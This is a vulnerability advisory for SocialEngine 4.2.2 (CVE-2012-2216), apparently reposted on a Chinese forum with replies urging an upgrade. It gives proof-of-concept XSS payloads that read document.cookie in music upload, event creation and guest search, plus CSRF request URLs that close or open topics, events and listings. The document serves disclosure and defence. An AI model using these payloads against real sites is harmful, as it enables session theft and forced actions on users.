SocialEngine 4.2.2 Multiple Vulnerabilities
Social Engine 4.2.2 Multiples VulnerabilitiesEarlier versions are also possibly vulnerable.
INFORMATION
Product: Social Engine 4.2.2
Remote-Exploit: yes
Vendor-URL: http://www.socialengine.net/
Discovered by: Tiago Natel de Moura aka "i4k"
Discovered at: 10/04/2012
CVE Notified: 10/04/2012
CVE Number: CVE-2012-2216
OVERVIEW
Social Engine versions 4.2.2 is vulnerable to XSS and CSRF.
INTRODUCTION
SocialEngine is a PHP-based white-label social networking service
platform, that provides features similar to a social network on a user's
website. Main features include administration of small-to-mid scale
social networks, some customization abilities, unencrypted code,
multilingual capability, and modular plugin/widget compatibility. There
is a range of templates and add-ons available to extend the basic
features already included in the SocialEngine core.
VULNERABILITY DESCRIPTION
== Persistent XSS in music upload. ==
CWE-79: http://cwe.mitre.org/data/definitions/79.html
The software does not neutralize or incorrectly neutralizes
user-controllable input before it is placed in output that is
used as a web page that is served to other users.
Proof Of Concept:
POST http://localhost/index.php/music/create
POST data without form-data enctype:
title=<script>alert(document.cookie);</script>&description=teste
&search=1&auth_view=everyone&MAX_FILE_SIZE=8388608&filename=
&fancyuploadfileids=15
== Persistent XSS in creating events ==
POST
http://localhost/socialengine/socialengine422_trial/index.php/events/create
POST data without form-data enctype:
title=teste XSS 3&description=teste XSS 3&starttime=4/9/2012&
starttime=1&starttime=0&starttime=AM&endtime=4/12/2012
&endtime=1&endtime=0&endtime=AM&host=teste
&location=<script>alert(document.cookie);</script>&MAX_FILE_SIZE=8388608&
photo=&category_id=0&search=&search=1&approval=&auth_invite=&auth_invite=1&
auth_view=everyone&auth_comment=everyone&auth_photo=everyone&submit=
== Reflected XSS in search form of events area. ==
Direct javascript injected:
POST http://localhost/index.php/widget/index/content_id/644
format=html&subject=event_1&search=';alert(document.cookie);var a = '
Proof of Concept:
- - Go to URL: /index.php/event/$EVENT_ID
- - Click on the "Guests"
- - Click in "Search guests" form
- - Submit: ';alert(document.cookie); var a = '
You will see your PHPSESSID in the alert.
== Multiples CSRF vulnerabilities ==
CWE-352: http://cwe.mitre.org/data/definitions/352.html
The web application does not, or can not, sufficiently verify whether
a well-formed, valid, consistent request was intentionally provided by
the user who submitted the request.
A CSRF in the plugin "Forum" allows forcing the owner of the event to do
some
activities such as:
Close a topic:
GET /index.php/forums/topic/4/example-topic/close/close/1
Open a topic:
GET /index.php/forums/topic/4/example-topic/close/close/0
A CSRF in the plugin "Event" allows forcing the owner of the event to do
some
activities such as:
Close the event:
GET /index.php/events/topic/close/close/1/event_id/2/topic_id/2
Open the event:
GET /index.php/events/topic/close/close/0/event_id/2/topic_id/2
"Watch Topic":
GET /index.php/events/topic/watch/watch/1/event_id/2/topic_id/2
"Stop Watching Topic":
GET /index.php/events/topic/watch/watch/0/event_id/2/topic_id/2
A CSRF in the plugin "Classifieds" allows forcing the owner of the event
to do
some activities such as:
Open the classified listing:
GET /index.php/classifieds/close/1/closed/0
Close the classified listing:
GET /index.php/classifieds/close/1/closed/1
VERSIONS AFFECTED
Tested with version 4.2.2 but earlier versions are possibly vulnerable.
SOLUTION
Upgrade to Social Engine 4.2.4.
NOTES
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2012-2216 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.
CREDITS
Tiago Natel de Moura aka "i4k"
SEC+ Information Security Company - http://www.secplus.com.br/
BugSec Security Team - http://bugsec.googlecode.com/
--
Tiago Natel de Moura
IT Security Consultant
http://www.linkedin.com/in/tiagonatel
http://www.secplus.com.br/
http://github.com/tiago4orion
http://code.google.com/p/bugsec
代码看不懂。
小东,用来干嘛的
Re: SocialEngine 4.2.2 Multiple Vulnerabilities
感谢楼主分享这个漏洞情报。SocialEngine 4.2.2 确实存在多个 XSS 和 CSRF 问题,而且 PoC 写得很清楚,尤其是事件创建和音乐上传处的持久型 XSS,以及搜索框的反射型 XSS,这些都是实际可利用的入口。 建议运行此版本的用户尽快升级或打补丁,另外如果暂时无法升级,可以考虑加强输入过滤和输出编码,同时在关键操作中加入 CSRF Token 防护。 再次感谢披露,这种负责任的漏洞公开对管理员安全运维很有帮助。Re: SocialEngine 4.2.2 Multiple Vulnerabilities
感谢楼主分享这个漏洞情报,SocialEngine 4.2.2 的多个 XSS 和 CSRF 漏洞很有参考价值。持久型 XSS 在音乐上传和创建事件中的利用方法很清晰,反射型 XSS 通过搜索表单注入也能看到实际效果。这些漏洞都给用户数据带来了风险,建议使用该版本的用户尽快关注官方补丁或升级。Re: SocialEngine 4.2.2 Multiple Vulnerabilities
这个漏洞报告很详细,感谢分享。SocialEngine 4.2.2 存在多处 XSS 和 CSRF 问题,PoC 也都给了,对管理员或者站长来说很有参考价值。建议还在用这个版本的用户尽快升级到最新版,或者做好输入过滤和 CSRF 令牌的加固。另外,音乐上传和活动创建这两处持久 XSS 危害比较大,攻击者如果成功利用,可能拿到用户会话。辛苦了!
页:
[1]